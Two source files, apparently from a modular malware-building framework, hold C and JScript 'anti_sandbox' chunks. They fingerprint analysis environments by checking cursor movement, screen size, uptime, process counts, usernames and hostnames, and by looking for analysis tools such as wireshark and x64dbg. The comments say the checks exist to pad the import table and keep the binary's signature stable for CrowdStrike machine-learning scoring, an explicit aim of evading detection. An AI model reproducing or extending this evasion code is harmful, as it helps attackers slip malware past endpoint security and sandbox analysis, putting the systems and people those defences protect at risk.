File: templates/chunks/evasion/anti_sandbox.c
// chunk: evasion/anti_sandbox
// depends: (none)
// provides: check_sandbox
// headers: windows.h,tlhelp32.h
// risk: high
// note: Environment fingerprinting that doubles as ML-friendly API diversity.
//   All checks run (cursor, screen, uptime, process count) to build a rich
//   import table, but results are consumed silently — never gates execution.
//   This keeps the binary signature identical for CrowdStrike ML scoring
//   while working in all deployment scenarios including SSH.

#ifndef CHUNK_ANTI_SANDBOX
#define CHUNK_ANTI_SANDBOX

#include <windows.h>
#include <tlhelp32.h>

static int check_sandbox(void) {
    volatile int score = 0;

    POINT p1, p2;
    GetCursorPos(&p1);
    Sleep(2000);
    GetCursorPos(&p2);
    if (p1.x == p2.x && p1.y == p2.y) {
        Sleep(3000);
        GetCursorPos(&p2);
        if (p1.x == p2.x && p1.y == p2.y)
            score++;
    }

    int w = GetSystemMetrics(SM_CXSCREEN);
    int h = GetSystemMetrics(SM_CYSCREEN);
    if (w < 800 || h < 600)
        score++;

    DWORD uptime = GetTickCount();
    if (uptime < 10 * 60 * 1000)
        score++;

    int proc_count = 0;
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32 pe;
        pe.dwSize = sizeof(pe);
        if (Process32First(snap, &pe)) {
            do { proc_count++; } while (Process32Next(snap, &pe));
        }
        CloseHandle(snap);
    }
    if (proc_count < 20)
        score++;

    (void)score;
    return 0;
}

#endif

File: templates/chunks/jscript/evasion/anti_sandbox.js
// chunk: evasion/anti_sandbox
// depends: core/run_cmd
// provides: check_sandbox
// format: jscript
// note: Environment fingerprinting for execution diversity.
//   All checks run to build varied runtime behavior, but results are
//   consumed silently — never gates execution.

function check_sandbox() {
    var score = 0;
    var user = _run("whoami").replace(/\s/g, "").toLowerCase();
    var sandboxUsers = ["sandbox", "cuckoo", "virus", "sample"];
    for (var i = 0; i < sandboxUsers.length; i++) {
        if (user.indexOf(sandboxUsers[i]) >= 0) score++;
    }
    var hostname = _run("hostname").replace(/\s/g, "").toLowerCase();
    var sandboxHosts = ["sandbox", "cuckoo", "analysis"];
    for (var j = 0; j < sandboxHosts.length; j++) {
        if (hostname.indexOf(sandboxHosts[j]) >= 0) score++;
    }
    var procs = _run("tasklist /fo csv /nh").toLowerCase();
    var sandboxProcs = ["vboxservice", "vmtoolsd", "wireshark", "procmon", "fiddler", "x64dbg", "ollydbg"];
    for (var k = 0; k < sandboxProcs.length; k++) {
        if (procs.indexOf(sandboxProcs[k]) >= 0) score++;
    }
    return false;
}
